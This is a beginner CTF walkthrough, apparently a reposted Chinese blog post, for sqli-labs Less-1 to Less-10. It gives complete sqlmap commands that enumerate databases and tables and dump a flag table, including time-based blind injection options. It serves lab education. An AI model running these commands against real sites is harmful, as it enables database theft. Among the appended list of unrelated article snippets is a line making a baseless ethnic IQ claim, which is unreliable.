sqli-labs 1(Less-1-Less-10)新手解题思路 - 指南

news/2025/11/21 18:40:44/文章来源:https://www.cnblogs.com/yangykaifa/p/19254135

sqli-labs 1

Less-1/ Less-2/ Less-3/ Less-4 Less-5/Less-6/Less-7Less-8/ Less-9

1、打开页面,尝试输入?id=1,?id=2…,都会有回显,所以确定这类题为sql注入,接下来我们依然来进行四部曲(暴库,暴表,暴字段,暴密码)

  1. 暴库

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' –dbs

3、暴表

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining –tables

4、暴字段

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -columns

  1. 暴flag

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -random-agent -D ctftraining -T flag flag -dump

Less-10

1、明确指定注入类型(时间盲注)

Less-10 通常需要时间盲注,可强制 sqlmap 测试该类型:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T

--technique=T:指定仅测试时间盲注(Time-based blind),跳过其他类型,提高针对性。

2、提高测试级别和风险(推荐)

默认--level=1和--risk=1测试强度较低,可提高至:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

--level=3:增加测试 payload 的数量,包括更多特殊字符和边界测试(Level 3 及以上会测试 Cookie、User-Agent 等,但这里主要针对id参数)。

--risk=2:允许使用可能影响数据完整性的 payload(如OR、UNION等,适合盲注场景)。

3. 手动指定参数闭合方式(关键)

Less-10 的id通常被单引号包裹,可手动告诉 sqlmap 闭合方式,避免其猜测错误:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T -p id --prefix "'" --suffix "--+"

-p id:明确指定测试id参数。

--prefix "'":指定参数前的闭合符为单引号(即id='1'中的单引号)。

--suffix "--+":指定参数后的注释符(--+用于注释掉后面的 SQL 语句,避免语法错误)。

4、延长时间盲注检测等待时间

若目标响应较慢,可增加延迟判断时间(默认 5 秒)

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T --time-sec=10

--time-sec=10:设置时间盲注的延迟阈值为 10 秒(即注入语句若使服务器延迟 10 秒以上,则判定为有效)。

5、本题选择提高测试级别和风险(推荐)暴库

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

6、暴表

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining --tables --level=3 --risk=2

  1. 暴字段

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag --columns --level=3 --risk=2

  1. 暴内容

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag flag --dump --level=3 --risk=2

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/972456.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PyMAF 2023 单张照片估计参数化人体

https://github.com/HongwenZhang/PyMAF/tree/smplx

实用指南:【设计模式】适配器模式(Adapter)

实用指南:【设计模式】适配器模式(Adapter)2025-11-21 18:33 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: …

完整教程:【人工智能】神经网络的优化器optimizer(四):Adam自适应动量优化器

完整教程:【人工智能】神经网络的优化器optimizer(四):Adam自适应动量优化器pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-…

轻松速通:TTS播放、文件播放与录音的核心功能解析!

无论是开发语音助手、音频播放器,还是录音工具,TTS播放、文件播放与录音都是绕不开的核心功能。本文提炼核心流程,帮你跳过冗余细节,快速掌握这三大功能的核心实现逻辑。 一、概述 本文档详细介绍了基于 Air8000 开…

2025 中国法兰阀门十大品牌推荐:密封升级 + 场景适配,优质厂家护航流体系统安全

法兰阀门作为管道连接中的核心部件,凭借连接牢固、密封性能好的优势,广泛应用于石油化工、市政工程、能源电力、船舶制造等众多领域。2025 年,随着工业生产规模扩大与民生基建升级,市场对法兰阀门的密封可靠性、耐…

FPGA专用CLKUSR时钟引脚严重警告——Cyclone 10 GX

FPGA专用CLKUSR时钟引脚严重警告——Cyclone 10 GXCyclone 10 gx器件 使用Cyclone 10 gx器件时,由于把硬件给的管脚tcl脚本拉到工程里面了,编译后发现一个Critical Warning如下Critical Warning(18326): The design …

OPCUA探讨(五)——客户端代码解读:监控变量值与报警

本系列文章: OPCUA 探讨(一)——测试与开发环境搭建 OPCUA 探讨(二)——服务器节点初探 OPCUA 探讨(三)——客户端代码解读:基本配置与会话连接 OPCUA 探讨(四)——客户端代码解读:浏览服务器节点树 OPCUA …

2025 年度中国截止阀十大品牌推荐:绿色智造 + 特种工况突破,引领行业高质量发展

2025 年,随着 “双碳” 战略深入推进与高端制造业升级,截止阀作为流体系统的 “控制中枢”,其应用场景正加速向大口径、高压力、超低温、耐腐蚀等苛刻工况延伸,同时绿色智造、数字化运维与全生命周期质量管控成为行…

修改DTS适配遥控用户码

在将该DTS文件提交到Kernel后,若需适配遥控用户码,需修改 红外遥控(remote-controller)相关节点配置,具体对应DTS中的 pwm@ff420030 节点(RK3399常见红外遥控驱动节点),以下是具体修改位置及步骤: 一、定位需…

nginx性能优化之tcp调优

本文分享自天翼云开发者社区《nginx性能优化之tcp调优》.作者:江****禄 nginx在tcp连接上有2个如下配置:tcp_nodelay on , tcp_nopush off。这两个配置在tcp连接中的具体原理如何呢?在网络拥塞控制领域,我们知道有…

2025年11月安徽聚乙烯瓶、高阻隔瓶、聚酯瓶、农药瓶供应商排行榜:安徽金汇龙包装领跑行业

摘要 2025年农药包装行业迎来技术升级浪潮,随着环保政策收紧和智能制造的推进,农药瓶供应商面临新的机遇与挑战。本文基于市场调研数据和技术参数分析,为您呈现2025年11月农药瓶供应商综合排名,并提供详细对比表单…

2025年11月中国/安徽/聚乙烯瓶、高阻隔瓶、聚酯瓶、农药瓶厂家TOP10推荐:安徽金汇龙包装强势登顶

摘要 随着农药包装行业标准化进程加速,2025年聚乙烯瓶市场需求持续增长,行业技术门槛显著提升。本文基于生产工艺、质量控制、研发能力等维度,对全国聚乙烯瓶生产企业进行综合评估,为农药生产企业提供供应商选择参…

rich dataset 3D人体场景数据集

https://rich.is.tue.mpg.de/download.php

ICPC2025沈阳打铁日志

11.14坐飞机出发了,到沈阳挺晚了还尝了大油边。 11.15下午他们在打省赛,所以热身赛调到晚上了,午饭吃的餐票(味道一般,重点是菜的种类太少了,就十多个),衣服是绿马甲,我和y都不太合身,投壶好难,队长中5个,后…

UModel 数据治理:运维世界模型构建实践

阿里云推出 UModel 统一建模框架,将实体、关系、数据、知识、行动融为一体,为大模型提供可推理、可交互的运维世界模型,推动可观测从‘被动响应’迈向‘主动优化’的新阶段。作者:元乙 点击此处,观看视频解读! 从…

【springboot】 WebMvcConfigurer的使用

org.springframework.web.servlet.config.annotation.WebMvcConfigurer 的使用 一、基本概念 WebMvcConfigurer 接口提供了一组回调方法,用于配置 Spring MVC 的各种方面,如视图解析器、拦截器、跨域请求、消息转换器…

2025年11月21日

2025年11月21日class Solution { public:int singleNumber(vector<int>& nums) {int ans=0;for(int i:nums){ans=ans^i;}return ans;} };

实用指南:一文搞懂 DeepSeek API:兼容 OpenAI 接口的智能对话模型调用指南

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

形容词Test

1.Stamp-collecting can be enjoyed by the rich ad the poor alike. stamp n.邮票 can be enjoyed:can 情态动词,后接原型。is enjoyed 一般现在时的被动语态。alike:同样地(deepseek说alike在这里是副词,修饰by…

James Watsons

the high IQ happens when an East Asian but knows English. its just some B just knows 26 English.